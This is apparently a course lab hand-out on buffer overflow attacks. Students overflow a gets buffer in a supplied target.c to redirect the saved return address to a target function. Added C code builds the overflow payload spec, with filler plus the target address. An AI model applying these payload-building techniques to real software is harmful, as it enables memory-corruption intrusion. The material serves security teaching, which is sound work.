We learned about buffer overflow attacks in class yesterday. See the lecture notes if you don't remember the details. Today in lab, you get to create a buffer overflow attack.
First, download the code in lab10.tar.gz. This will un-tar into the lab10 directory.
In the lab10 directory, there is C code called target.c which compiles into a binary executable called target. The rule of today's lab is that you are not allowed to change the code in target.c. The objective of today's lab is to invoke the target function at the bottom of target.c using a buffer overflow attack.
I have provided a utility command called makeHex to help you out with your attack. This program reads a text file from standard input that defines what its output file should look like. Each line in the input file should start with either the character C, which says that the remainder of the line is to be copied as text to the output file, or the character D, which says that the remainder of the line contains a number to be inserted in the output file as a single four-byte word. The number follows the C conventions: if it starts with a digit in 1-9, it is interpreted as a decimal number; if it starts with the prefix 0x, it is interpreted as a hexadecimal number.
For example, to create the file we used in yesterday's lecture, you could specify the following:
C THE FIRST EIGHTY...
D 0x22222222
D 0x22222222
D 0x11111111
D 0x00401230
In fact, I have included this example in the lab10 directory as a file called xmp.txt. To convert it into the file of hexadecimal values used in the lecture, run make xmpHex.txt. To run the octal dump command (od) on the resulting file and see its contents in both character and decimal form, run make showXmp.
Notice that I did not have to reverse the bytes of the last address in the xmp.txt file. That is because I am asking makeHex to treat it as a full word. Under the covers, makeHex converts the full word value into four bytes in the order the x86 actually stores them, so in the output file the bytes appear reversed: 30 12 40 00 rather than 00 40 12 30. In other words, makeHex lets us write a full word the way we read it (most significant byte first, as if it were big-endian) and takes care of laying it out little-endian, which is what the stack expects.
If you are curious about how the makeHex command works, feel free to take a look at makeHex.c. The code is not terribly difficult, and it shows another example of why you might want to use a union in C code.
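Here is an added example, written for this page rather than taken from the lab's makeHex.c, of a converter that implements the spec format described above: C lines are copied as text, D lines become one four-byte word, and the word is split into bytes through a union exactly so the little-endian reversal falls out of how the machine stores it. The function names (convert_line, convert_spec) and the line-length limit are my own choices, not anything the hand-out defines.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A union lets one 32-bit word be read back as the four bytes the machine
 * actually stores for it.  On a little-endian host (x86) the low byte comes
 * first, so 0x00401230 comes out as 30 12 40 00.  This matches the x86
 * target only because the host is little-endian as well; a portable tool
 * would split the word with shifts instead. */
union word_bytes {
    uint32_t word;
    unsigned char bytes[4];
};

/* Convert one spec line ("C text" or "D number") into payload bytes.
 * Returns the number of bytes written to out, or -1 if the line is malformed
 * or does not fit.  A trailing newline terminates the spec line; it is not
 * payload, so it is stripped. */
int convert_line(const char *line, unsigned char *out, size_t cap)
{
    size_t len = strlen(line);
    if (len > 0 && line[len - 1] == '\n')
        len--;
    if (len < 2 || line[1] != ' ')
        return -1;
    const char *arg = line + 2;
    size_t arglen = len - 2;

    if (line[0] == 'C') {
        if (arglen > cap)
            return -1;
        memcpy(out, arg, arglen);
        return (int)arglen;
    }
    if (line[0] == 'D') {
        char *end;
        if (cap < 4)
            return -1;
        /* Base 0 gives the C literal conventions: a 0x prefix is hex, a
         * leading 1-9 is decimal (and, as in C, a leading 0 is octal). */
        errno = 0;
        unsigned long v = strtoul(arg, &end, 0);
        if (end == arg || *end != '\0' || errno == ERANGE || v > 0xFFFFFFFFul)
            return -1;
        union word_bytes w;
        w.word = (uint32_t)v;
        memcpy(out, w.bytes, 4);
        return 4;
    }
    return -1;
}

/* Convert a whole spec (lines separated by '\n') into payload bytes.
 * Returns the total payload length, or -1 at the first bad line. */
long convert_spec(const char *spec, unsigned char *out, size_t cap)
{
    long total = 0;
    const char *p = spec;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t linelen = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];                     /* my own line-length limit */
        if (linelen >= sizeof line)
            return -1;
        memcpy(line, p, linelen);
        line[linelen] = '\0';
        int n = convert_line(line, out + total, cap - (size_t)total);
        if (n < 0)
            return -1;
        total += n;
        p = nl ? nl + 1 : p + linelen;
    }
    return total;
}

/* Stand-alone use, mirroring the hand-out's tool: makehex < spec.txt > payload */
int main(void)
{
    char line[256];
    unsigned char out[256];
    while (fgets(line, sizeof line, stdin)) {
        int n = convert_line(line, out, sizeof out);
        if (n < 0) {
            fprintf(stderr, "bad line: %s", line);
            return 1;
        }
        fwrite(out, 1, (size_t)n, stdout);
    }
    return 0;
}
```

Run it on xmp.txt and pipe the result through od -c to confirm that the text survives unchanged and the final word appears as 30 12 40 00, the same reversal the lecture file showed.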
Notice that I have provided a Makefile with several useful make targets. These include the following:
Take a look at the Makefile and notice that there are many dependencies. It is set up so that when you make a target, everything that target depends on is built automatically before the target's own command runs.
Your job today is to run make test and get, as the last line of output, "Whoopee... you ran the target!" without changing target.c.
In order to accomplish this, you will need to look at target.c and find out where it is vulnerable to a buffer overflow attack. Then you will have to design an attack that overwrites the saved return address with the address in memory of the first instruction of the target function. You will have to look at the x86 code to figure out both what that address is and how far from the start of the buffer the return address sits, so you know where to put that address in your input file. Then you will have to modify test.txt so that makeHex produces a testhex.txt that implements a successful buffer overflow attack.
Don't be surprised if your buffer overflow attack doesn't work the first time. Use the gdb techniques we learned to examine the contents of the stack after the gets call has completed. The make gdb invocation should get you there quickly. You should be able to see the effect of your input file on the stack frame and check whether you have put the correct values in the correct places.
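The arithmetic behind the design step, as an added example that is not part of the hand-out: given the two numbers you read off in gdb (the address of the vulnerable buffer, e.g. from p &buf, and the address of the saved return address, e.g. from the "saved eip at" line of info frame) and the address of the target function, it writes the makeHex spec for the overwrite. The filler layout copies the lecture's xmp.txt (text first, then filler words), the buffer name buf and all stack addresses are made up for illustration, and the function names are my own; the target address reused in main is the lecture's 0x00401230.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Number of bytes between the first byte of the vulnerable buffer and the
 * saved return address.  Everything in between (the rest of the buffer, any
 * padding the compiler inserted, the saved frame pointer) is overwritten too;
 * what lands there does not matter as long as the function never uses it
 * again before it returns. */
long bytes_to_return_address(uint32_t buf_addr, uint32_t ret_slot_addr)
{
    return (long)ret_slot_addr - (long)buf_addr;
}

/* gets() stops reading at the first newline, so a word containing the byte
 * 0x0a can never reach the stack intact.  Returns 1 if addr is safe. */
int gets_safe_word(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == '\n')
            return 0;
    return 1;
}

/* Write the makeHex spec into out: a short C line for the bytes that do not
 * fill a whole word, then D words of 0x41414141 ("AAAA") up to the return
 * address, then one D line with the address to jump to.  Returns the payload
 * length makeHex will produce, or -1 if the spec cannot be built. */
long build_spec(char *out, size_t cap,
                uint32_t buf_addr, uint32_t ret_slot_addr, uint32_t target_addr)
{
    long pad = bytes_to_return_address(buf_addr, ret_slot_addr);
    if (pad < 0 || !gets_safe_word(target_addr))
        return -1;
    long words = pad / 4;
    int text = (int)(pad % 4);
    size_t used = 0;
    int n;

    if (text > 0) {
        n = snprintf(out + used, cap - used, "C %.*s\n", text, "AAA");
        if (n < 0 || (size_t)n >= cap - used)
            return -1;
        used += (size_t)n;
    }
    for (long i = 0; i < words; i++) {
        n = snprintf(out + used, cap - used, "D 0x41414141\n");
        if (n < 0 || (size_t)n >= cap - used)
            return -1;
        used += (size_t)n;
    }
    /* Written most-significant byte first; makeHex reverses it for us. */
    n = snprintf(out + used, cap - used, "D 0x%08x\n", (unsigned)target_addr);
    if (n < 0 || (size_t)n >= cap - used)
        return -1;
    return pad + 4;
}

/* Stand-alone use: print the spec, then feed it to makeHex.  The two stack
 * addresses are constructed for this example, not the lab's real values. */
int main(void)
{
    char spec[512];
    long n = build_spec(spec, sizeof spec, 0x0022ff10u, 0x0022ff2cu, 0x00401230u);
    if (n < 0) {
        fputs("cannot build spec\n", stderr);
        return 1;
    }
    fputs(spec, stdout);
    fprintf(stderr, "payload will be %ld bytes\n", n);
    return 0;
}
```

If the attack still fails, check the two distances in gdb rather than the spec: the payload length must equal (saved return address slot) minus (buffer start) plus four, and none of the bytes between may be a newline, or gets will stop short of the return address.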
Download and edit the following file: lab10_report.txt. Then submit your edited file on Blackboard in the Lab 10 submission area.